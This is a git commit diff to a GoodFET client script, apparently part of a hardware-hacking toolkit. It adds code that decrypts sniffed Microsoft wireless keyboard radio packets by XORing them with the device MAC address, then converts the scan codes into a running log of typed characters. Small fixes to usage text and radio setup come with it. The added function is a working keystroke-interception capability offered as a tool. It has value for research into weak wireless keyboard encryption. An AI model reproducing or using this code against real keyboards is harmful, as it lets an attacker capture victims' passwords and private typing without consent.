More string decoding from Microsoft keyboards.

[goodfet] / client / goodfet.nrf

diff --git a/client/goodfet.nrf b/client/goodfet.nrf
index 35d608f..68d402d 100755 (executable)
--- a/client/goodfet.nrf
+++ b/client/goodfet.nrf
@@ -30,23 +30,60 @@ def printpacket(packet):
         s="%s %02x" % (s,ord(foo));
     print "%s" % s;
 
+
+mskbstring="";
 def printmspacket(packet,offset=1):
+    """Decodes a Microsoft keyboard packet and maintains the typed strings."""
+    global mskbstring;
     keyword=client.RF_getsmac();
     #print "keyword=%010x" % key;
     key=[];
+    ct=[];
     for foo in range(0,5):
         key.append(keyword&0xFF);
         keyword=(keyword>>8);
         #print "Keybyte %02x" % key[foo];
     i=0;
     s="";
+    
     for foo in packet:
         if i>=4:
+            ct.append(ord(foo)^key[(i+offset)%5]);
             s="%s %02x" % (s,ord(foo)^key[(i+offset)%5]);
         else:
+            ct.append(ord(foo));
             s="%s %02x" % (s,ord(foo));
         i=i+1;
-    print "%s" % (s);
+    #Uncomment this to print the raw packet, kinda noisy.
+    #print "%s" % (s);
+    
+    letter=None;
+    if ct[0]==0x0a and ct[1]==0x78:
+        if ct[9]==0:
+            #Key up event, not worth logging.
+            pass;
+        elif ct[9]>=4 and ct[9]<0x1E:
+            letter=ct[9]+ord('A')-4;
+        elif ct[9]>=0x1E and ct[9]<0x27:
+            letter=ct[9]+ord('1')-0x1E;
+        elif ct[9]==0x27:
+            letter=ord('0');
+        elif ct[9]==0x29:
+            #escape
+            letter=ord('e');
+        elif ct[9]==0x2d:
+            letter=ord('-');
+        elif ct[9]==0x2e:
+            letter=ord('=');
+        elif ct[9]==0x35:
+            letter=ord('`');
+        elif ct[9]==0x2C:
+            letter=ord('_');
+        else:
+            print "Unknown character 0x%02x." % ct[9];
+    if letter!=None:
+        mskbstring="%s%c" % (mskbstring,letter);
+        print "# %s" % mskbstring
 def printconfig():
     print "Encoding %s" % client.RF_getenc();
     print "Freq    %10i MHz" % (client.RF_getfreq()/10**6);
@@ -71,7 +108,7 @@ if(len(sys.argv)==1):
     print "%s snifftp\n\tSniffs Turning Point Clicker traffic." % sys.argv[0];
     print "%s sniffsf\n\tSniffs SparkFun Dongle traffic." % sys.argv[0];
     print "";
-    print "%s sniffmacs \n\tSniffs for MAC addresses on the present channel.";
+    print "%s sniffmacs \n\tSniffs for MAC addresses on the present channel." % sys.argv[0];
     print "%s sniffprom [0xaa|0x55]\n\tSniffs promiscuously for a preamble of 0xAA or 0x55" % sys.argv[0];
     print "%s autotune\n\tSearches for a valid destination address." % sys.argv[0];
     print "";
@@ -284,7 +321,7 @@ class AutoTuner():
         #Disable shockburst.
         client.poke(0x1C,0x00);
         client.poke(0x1D,0x00);
-    
+        
         client.RF_setmaclen(2); # SETUP_AW for shortest
         
         #historic
@@ -647,6 +684,10 @@ if(sys.argv[1]=="snifftp"):
     client.poke(0x01,0x00); #Disable Shockburst
     client.poke(0x02,0x01); #Set RX Pipe 0
     
+    #Disable shockburst.
+    client.poke(0x1C,0x00);
+    client.poke(0x1D,0x00);
+    
     client.RF_setfreq((2400+0x29) * 10**6);
     client.poke(0x06,0x00); #1Mbps
     client.poke(0x07,0x78); #Reset status register